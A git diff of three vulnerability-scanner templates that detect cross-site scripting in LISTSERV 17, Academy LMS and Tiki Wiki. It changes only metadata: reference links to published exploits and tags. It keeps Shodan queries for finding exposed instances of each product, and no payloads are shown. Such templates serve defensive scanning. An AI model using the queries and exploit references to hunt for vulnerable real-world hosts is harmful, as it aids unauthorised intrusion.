index 5ae430505a..46eda1fd54 100644 --- a/cves/2022/CVE-2022-39195.yaml +++ b/cves/2022/CVE-2022-39195.yaml @@ -9,12 +9,14 @@ info: reference: - https://packetstormsecurity.com/files/170552/LISTSERV-17-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2022-39195 + - https://peach.ease.lsoft.com/scripts/wa-PEACH.exe?A0=LSTSRV-L + - https://packetstormsecurity.com/2301-exploits/listserv17-xss.txt classification: cve-id: CVE-2022-39195 metadata: - verified: "true" shodan-query: http.html:"LISTSERV" - tags: cve,cve2022,xss,listserv + verified: "true" + tags: cve,cve2022,xss,listserv,packetstorm requests: - method: GET diff --git a/vulnerabilities/other/academy-lms-xss.yaml b/vulnerabilities/other/academy-lms-xss.yaml index baefca419a..27be176690 100644 --- a/vulnerabilities/other/academy-lms-xss.yaml +++ b/vulnerabilities/other/academy-lms-xss.yaml @@ -12,7 +12,7 @@ info: metadata: verified: "true" shodan-query: http.html:"Academy LMS" - tags: lms,academy,xss + tags: packetstorm,lms,academy,xss requests: - method: GET diff --git a/vulnerabilities/other/tikiwiki-xss.yaml b/vulnerabilities/other/tikiwiki-xss.yaml index 92bb915404..2ce7ca8a1d 100644 --- a/vulnerabilities/other/tikiwiki-xss.yaml +++ b/vulnerabilities/other/tikiwiki-xss.yaml @@ -11,7 +11,7 @@ info: metadata: shodan-query: http.html:"tiki wiki" verified: "true" - tags: acketstorm,edb,xss,tikiwiki + tags: edb,xss,tikiwiki,packetstorm,acketstorm requests: - method: GET